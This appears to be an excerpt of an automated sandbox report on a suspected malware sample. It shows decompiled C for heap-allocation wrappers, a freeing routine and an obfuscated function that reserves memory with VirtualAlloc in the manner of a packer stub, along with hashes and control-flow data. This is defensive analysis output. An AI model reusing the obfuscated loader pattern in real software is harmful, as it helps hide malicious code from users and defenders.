                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                    • Opcode ID: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                    • Instruction ID: 4df66a7db5f6e1cf9cb54e7c2b30b6d47f4f73c70f3827ef8613a7da71214354
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D01FE76600309ABE3218F55D8419A9FBE9FB85370F25062DE595972C0EB306905D774
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 283 efa67d-efa688 284 efa68a-efa694 283->284 285 efa696-efa69c 283->285 284->285 286 efa6ca-efa6d5 call ef9826 284->286 287 efa69e-efa69f 285->287 288 efa6b5-efa6c6 RtlAllocateHeap 285->288 292 efa6d7-efa6d9 286->292 287->288 289 efa6c8 288->289 290 efa6a1-efa6a8 call efc742 288->290 289->292 290->286 296 efa6aa-efa6b3 call efc6ac 290->296 296->286 296->288
                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E00EFA67D(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                    				signed int _t18;
                                                                                                                                                                                                                                                    				long _t19;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                                    						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t8 = RtlAllocateHeap( *0xf8e1b0, 8, _t19); // executed
                                                                                                                                                                                                                                                    						if(_t8 != 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						__eflags = E00EFC742();
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(E00EF9826())) = 0xc;
                                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t12 = E00EFC6AC(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                    						_pop(_t15);
                                                                                                                                                                                                                                                    						__eflags = _t12;
                                                                                                                                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                    				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x00efa67d
                                                                                                                                                                                                                                                    0x00efa683
                                                                                                                                                                                                                                                    0x00efa688
                                                                                                                                                                                                                                                    0x00efa696
                                                                                                                                                                                                                                                    0x00efa696
                                                                                                                                                                                                                                                    0x00efa69c
                                                                                                                                                                                                                                                    0x00efa69e
                                                                                                                                                                                                                                                    0x00efa69e
                                                                                                                                                                                                                                                    0x00efa6b5
                                                                                                                                                                                                                                                    0x00efa6be
                                                                                                                                                                                                                                                    0x00efa6c6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa6a6
                                                                                                                                                                                                                                                    0x00efa6a8
                                                                                                                                                                                                                                                    0x00efa6ca
                                                                                                                                                                                                                                                    0x00efa6cf
                                                                                                                                                                                                                                                    0x00efa6d5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa6d5
                                                                                                                                                                                                                                                    0x00efa6ab
                                                                                                                                                                                                                                                    0x00efa6b0
                                                                                                                                                                                                                                                    0x00efa6b1
                                                                                                                                                                                                                                                    0x00efa6b3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa6b3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa6b5
                                                                                                                                                                                                                                                    0x00efa68e
                                                                                                                                                                                                                                                    0x00efa694
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EF9C5E,00000001,00000364,?,00EF4B88,?), ref: 00EFA6BE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: b68038ee319814bb2ceb368b7e7d144659582e3dc69ff21155294e0614b4bea6
                                                                                                                                                                                                                                                    • Instruction ID: cfc0bb5ed872efc36fad6b8a4bd87059c5d3b05c24ef801c9c570ddb5ecd7b57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b68038ee319814bb2ceb368b7e7d144659582e3dc69ff21155294e0614b4bea6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0BB7150412C67DB211F326C05AB63749AF517A5B1E7031AA1DFE191DA60D80046E6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 299 efbd19-efbd25 300 efbd57-efbd62 call ef9826 299->300 301 efbd27-efbd29 299->301 308 efbd64-efbd66 300->308 303 efbd2b-efbd2c 301->303 304 efbd42-efbd53 RtlAllocateHeap 301->304 303->304 305 efbd2e-efbd35 call efc742 304->305 306 efbd55 304->306 305->300 311 efbd37-efbd40 call efc6ac 305->311 306->308 311->300 311->304
                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                    			E00EFBD19(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                    				long _t8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t7 = __ecx;
                                                                                                                                                                                                                                                    				_t8 = _a4;
                                                                                                                                                                                                                                                    				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(E00EF9826())) = 0xc;
                                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                                                                    					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t4 = RtlAllocateHeap( *0xf8e1b0, 0, _t8); // executed
                                                                                                                                                                                                                                                    					if(_t4 != 0) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					__eflags = E00EFC742();
                                                                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t6 = E00EFC6AC(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                    					_pop(_t7);
                                                                                                                                                                                                                                                    					__eflags = _t6;
                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x00efbd19
                                                                                                                                                                                                                                                    0x00efbd1f
                                                                                                                                                                                                                                                    0x00efbd25
                                                                                                                                                                                                                                                    0x00efbd57
                                                                                                                                                                                                                                                    0x00efbd5c
                                                                                                                                                                                                                                                    0x00efbd62
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbd62
                                                                                                                                                                                                                                                    0x00efbd29
                                                                                                                                                                                                                                                    0x00efbd2b
                                                                                                                                                                                                                                                    0x00efbd2b
                                                                                                                                                                                                                                                    0x00efbd42
                                                                                                                                                                                                                                                    0x00efbd4b
                                                                                                                                                                                                                                                    0x00efbd53
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbd33
                                                                                                                                                                                                                                                    0x00efbd35
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbd38
                                                                                                                                                                                                                                                    0x00efbd3d
                                                                                                                                                                                                                                                    0x00efbd3e
                                                                                                                                                                                                                                                    0x00efbd40
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbd40
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00EFA5A1,00000000), ref: 00EFBD4B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 0525a12718013748186283edec439ce860949035dcde778bcb51df1bcad7be24
                                                                                                                                                                                                                                                    • Instruction ID: bd47a2003f0ca56d74ff444717145abd6b8fde08310a9ad399d02fa1befbddef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0525a12718013748186283edec439ce860949035dcde778bcb51df1bcad7be24
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFE0653150426D97D6213675DC05BBB768CAB417A4F257121AF55BA1E1DB63CC0085E3
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 315 ef47e0-ef4843 316 ef48ef-ef48f5 315->316 317 ef4849-ef4856 315->317 318 ef4900-ef4912 316->318 319 ef4889-ef48be VirtualAlloc 317->319 320 ef4858-ef4887 317->320 321 ef4984-ef498d 318->321 322 ef4914-ef492c 318->322 323 ef48c3-ef48ea 319->323 320->323 324 ef4937-ef4957 322->324 323->321 325 ef497f 324->325 326 ef4959-ef497d 324->326 325->318 326->324
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EF47E0(signed int _a4, intOrPtr _a8, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                    				intOrPtr _t94;
                                                                                                                                                                                                                                                    				intOrPtr _t107;
                                                                                                                                                                                                                                                    				intOrPtr _t123;
                                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v28 = _a16 - 0x2598;
                                                                                                                                                                                                                                                    				_v36 = _a24 + 0x14d;
                                                                                                                                                                                                                                                    				_v24 = _a20 - 0xce;
                                                                                                                                                                                                                                                    				_v8 = _a4 ^ 0x000002bf;
                                                                                                                                                                                                                                                    				_v40 = _a24 + 0x221;
                                                                                                                                                                                                                                                    				_v16 = _a16 ^ 0x00000221;
                                                                                                                                                                                                                                                    				_v32 = _a20 + 0x1ce;
                                                                                                                                                                                                                                                    				if(_v8 == _v40 - 0x219) {
                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                    					while(_v12 < (_v16 & 0x0000253b) - 0x2633) {
                                                                                                                                                                                                                                                    						_t94 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_v20 =  *((intOrPtr*)(_t94 + 0xbadc65));
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							_t74 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    							if(_v20 <= (_v16 | 0x00002801) +  *((intOrPtr*)(_t74 + 0xbadc81))) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v24 = ( *(_a8 + 0xec) & 0x00002796) -  *((intOrPtr*)(_a8 + 0xbadbed)) + _v24;
                                                                                                                                                                                                                                                    							_v20 = _v20 + 3;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v12 = _v12 + 4;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a8 + 0xb0)) <= 0xd708) {
                                                                                                                                                                                                                                                    						_v48 = 0x3000;
                                                                                                                                                                                                                                                    						_t123 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t26 = _t123 + 0x8c; // 0x0
                                                                                                                                                                                                                                                    						_v44 =  *_t26 + 0x40;
                                                                                                                                                                                                                                                    						_t82 = VirtualAlloc(0,  *(_a8 + 0x24), _v48, _v44); // executed
                                                                                                                                                                                                                                                    						 *0xf8d684 = _t82 + 0x2000;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t87 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t23 = _t87 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t107 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						 *(_t107 + 0xdc) = ( *(_a8 + 0x9c) ^  *(_a8 + 0x8c)) + 0x0001cd0c |  *_t23;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t84 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t34 = _t84 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                    					_t127 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t127 + 0x5c)) =  *_t34 +  *(_a8 + 0x8c) - 0x4b764;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v32 ^ 0x0000003b;
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x00ef47ee
                                                                                                                                                                                                                                                    0x00ef47fa
                                                                                                                                                                                                                                                    0x00ef4806
                                                                                                                                                                                                                                                    0x00ef4811
                                                                                                                                                                                                                                                    0x00ef481d
                                                                                                                                                                                                                                                    0x00ef4829
                                                                                                                                                                                                                                                    0x00ef4834
                                                                                                                                                                                                                                                    0x00ef4843
                                                                                                                                                                                                                                                    0x00ef48f2
                                                                                                                                                                                                                                                    0x00ef4900
                                                                                                                                                                                                                                                    0x00ef491c
                                                                                                                                                                                                                                                    0x00ef4929
                                                                                                                                                                                                                                                    0x00ef4937
                                                                                                                                                                                                                                                    0x00ef4948
                                                                                                                                                                                                                                                    0x00ef4957
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef497a
                                                                                                                                                                                                                                                    0x00ef4934
                                                                                                                                                                                                                                                    0x00ef4934
                                                                                                                                                                                                                                                    0x00ef48fd
                                                                                                                                                                                                                                                    0x00ef48fd
                                                                                                                                                                                                                                                    0x00ef4849
                                                                                                                                                                                                                                                    0x00ef4856
                                                                                                                                                                                                                                                    0x00ef4889
                                                                                                                                                                                                                                                    0x00ef4890
                                                                                                                                                                                                                                                    0x00ef4896
                                                                                                                                                                                                                                                    0x00ef489f
                                                                                                                                                                                                                                                    0x00ef48b3
                                                                                                                                                                                                                                                    0x00ef48be
                                                                                                                                                                                                                                                    0x00ef4858
                                                                                                                                                                                                                                                    0x00ef4870
                                                                                                                                                                                                                                                    0x00ef4875
                                                                                                                                                                                                                                                    0x00ef487b
                                                                                                                                                                                                                                                    0x00ef4881
                                                                                                                                                                                                                                                    0x00ef4881
                                                                                                                                                                                                                                                    0x00ef48c9
                                                                                                                                                                                                                                                    0x00ef48ce
                                                                                                                                                                                                                                                    0x00ef48e1
                                                                                                                                                                                                                                                    0x00ef48e7
                                                                                                                                                                                                                                                    0x00ef48e7
                                                                                                                                                                                                                                                    0x00ef498d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,?), ref: 00EF48B3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 00e8014985bbac56d01b1c8d518926400e996b64b6ab734eec5918e21658a124
                                                                                                                                                                                                                                                    • Instruction ID: 6e402a14a12977517b234b4ffb2ce376907df42b92893f0c42101e057be4c0a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00e8014985bbac56d01b1c8d518926400e996b64b6ab734eec5918e21658a124
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3851C770A00109DFEB04DF98D594BAEB7B2FF88304F14C26AE915AB385D735AA51CF94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EFAC2C(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t74 = _a4;
                                                                                                                                                                                                                                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                    				if(_t25 != 0 && _t25 != 0xf8dd10) {
                                                                                                                                                                                                                                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                    							E00EFA6DA(_t46);
                                                                                                                                                                                                                                                    							E00EFBA92( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                    							E00EFA6DA(_t47);
                                                                                                                                                                                                                                                    							E00EFBB90( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						E00EFA6DA( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                    						E00EFA6DA( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EFAD9F( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                    				_t28 = 6;
                                                                                                                                                                                                                                                    				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                    				_v8 = _t28;
                                                                                                                                                                                                                                                    				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t70 - 8)) != 0xf8d7d0) {
                                                                                                                                                                                                                                                    						_t31 =  *_t70;
                                                                                                                                                                                                                                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                    							E00EFA6DA(_t31);
                                                                                                                                                                                                                                                    							E00EFA6DA( *_t55);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t28 = _v8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                    							E00EFA6DA(_t29);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t28 = _v8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                    					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                    					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                    					_v8 = _t28;
                                                                                                                                                                                                                                                    				} while (_t28 != 0);
                                                                                                                                                                                                                                                    				return E00EFA6DA(_t74);
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x00efac34
                                                                                                                                                                                                                                                    0x00efac38
                                                                                                                                                                                                                                                    0x00efac40
                                                                                                                                                                                                                                                    0x00efac49
                                                                                                                                                                                                                                                    0x00efac4e
                                                                                                                                                                                                                                                    0x00efac55
                                                                                                                                                                                                                                                    0x00efac5d
                                                                                                                                                                                                                                                    0x00efac65
                                                                                                                                                                                                                                                    0x00efac70
                                                                                                                                                                                                                                                    0x00efac76
                                                                                                                                                                                                                                                    0x00efac77
                                                                                                                                                                                                                                                    0x00efac7f
                                                                                                                                                                                                                                                    0x00efac87
                                                                                                                                                                                                                                                    0x00efac92
                                                                                                                                                                                                                                                    0x00efac98
                                                                                                                                                                                                                                                    0x00efac9c
                                                                                                                                                                                                                                                    0x00efaca7
                                                                                                                                                                                                                                                    0x00efacad
                                                                                                                                                                                                                                                    0x00efac4e
                                                                                                                                                                                                                                                    0x00efacae
                                                                                                                                                                                                                                                    0x00efacb6
                                                                                                                                                                                                                                                    0x00efacc9
                                                                                                                                                                                                                                                    0x00efacdc
                                                                                                                                                                                                                                                    0x00efacea
                                                                                                                                                                                                                                                    0x00efacf5
                                                                                                                                                                                                                                                    0x00efacfa
                                                                                                                                                                                                                                                    0x00efad03
                                                                                                                                                                                                                                                    0x00efad0b
                                                                                                                                                                                                                                                    0x00efad0c
                                                                                                                                                                                                                                                    0x00efad12
                                                                                                                                                                                                                                                    0x00efad15
